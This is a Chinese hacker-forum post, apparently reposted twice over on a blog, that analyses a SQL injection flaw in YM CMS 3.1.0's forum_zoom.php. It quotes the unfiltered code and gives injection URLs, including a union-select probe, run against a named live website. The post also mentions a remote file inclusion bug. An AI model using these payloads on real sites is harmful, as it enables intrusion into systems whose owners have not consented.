ymcms3.1.0漏洞分析
来源:互联网 发布:win10系统优化方法 编辑:程序博客网 时间:2024/05/16 14:09
注意:文章首发脚本安全小组内部论坛(Www.Cnsst.Org),后由原创作者友情提交到邪恶八进制信息安全团队技术论坛,转载请注明首发站点。
夜猫cms是一个很著名的商业cms,现在公开发放的免费版本最高是3.1.0(有哪位兄弟能提供
最新的3.2.0商业版,偶感激不尽)。看漏洞:
forum_zoom.php
31~48行
if ($forumid != ""){
$isforum = " && forumid IN (".$forumid.") ";
}else{
$isforum = "";
}
//forumid明显没有过滤
……
$sql = "SELECT threadid, title, lastpost FROM ".$ym_thread_tab." WHERE isshow='1' ".$isforum." ORDER BY ".$isaction." LIMIT 0, ".$shownum;
发生了注射
利用方法:
http://www.longchenhua.com/forum_zoom.php?forumid=15)%20and%201=1/*
正常
http://www.longchenhua.com/forum_zoom.php?forumid=15)%20and%201=2/*
空白
http://www.longchenhua.com/forum_zoom.php?forumid=15)%20and%201=2%20union%20select%201/*
暴错
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/ftp/512j.com/l/o/n/longchenhua/forum_zoom.php on line 50
大家看到了吧,可以自己去构造注射语句来利用了,偶就不再测试了
另外,这个系统还有远程包含的问题,大家要是有兴趣自己看哦
再次呼唤3.2.0商业版代码,可以发我邮箱,hoho
注:小组论坛因某些原因关闭了,小组一些原创的东西就发邪八给大家共享,Fly没权限,我代发了。
夜猫cms是一个很著名的商业cms,现在公开发放的免费版本最高是3.1.0(有哪位兄弟能提供
最新的3.2.0商业版,偶感激不尽)。看漏洞:
forum_zoom.php
31~48行
if ($forumid != ""){
$isforum = " && forumid IN (".$forumid.") ";
}else{
$isforum = "";
}
//forumid明显没有过滤
……
$sql = "SELECT threadid, title, lastpost FROM ".$ym_thread_tab." WHERE isshow='1' ".$isforum." ORDER BY ".$isaction." LIMIT 0, ".$shownum;
发生了注射
利用方法:
http://www.longchenhua.com/forum_zoom.php?forumid=15)%20and%201=1/*
正常
http://www.longchenhua.com/forum_zoom.php?forumid=15)%20and%201=2/*
空白
http://www.longchenhua.com/forum_zoom.php?forumid=15)%20and%201=2%20union%20select%201/*
暴错
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in /home/ftp/512j.com/l/o/n/longchenhua/forum_zoom.php on line 50
大家看到了吧,可以自己去构造注射语句来利用了,偶就不再测试了
另外,这个系统还有远程包含的问题,大家要是有兴趣自己看哦
再次呼唤3.2.0商业版代码,可以发我邮箱,hoho
注:小组论坛因某些原因关闭了,小组一些原创的东西就发邪八给大家共享,Fly没权限,我代发了。
- ymcms3.1.0漏洞分析
- Freefloat FTP Server 1.0 溢出漏洞分析
- Freefloat FTP Server 1.0溢出漏洞分析
- 漏洞分析马后炮 s2-045漏洞分析
- ICMP漏洞分析
- MS05-055漏洞分析
- 软件漏洞分析入门
- MS08-067漏洞分析
- MS08-067漏洞分析
- MS06-030漏洞分析
- 软件漏洞分析入门
- 智能手机漏洞分析
- MS10-081漏洞分析
- Windows SMB漏洞分析
- MS11-011漏洞分析
- xss漏洞简要分析
- 计算机漏洞分析
- LocalStorage漏洞分析
- WinXP下安装 Apache +PHP5 + MySQL + phpMyAdmin学习心得
- input只读
- snmp基本概念
- 装箱和拆箱
- 常用控件
- ymcms3.1.0漏洞分析
- request路径请求函数
- AgentX 文档资料
- MySQL也真是让人郁闷(关于子查询中使用limit)
- Import Data from Txt or CSV files into MYSQL database tables
- 创建一个CDialog对话框与对话框销毁
- 追MM与Java的23种设计模式
- B/S,C/S架构混合使用(from:http://www.kuqin.com/system-analysis/20080506/8024.html)
- 介绍自己如何独立调程序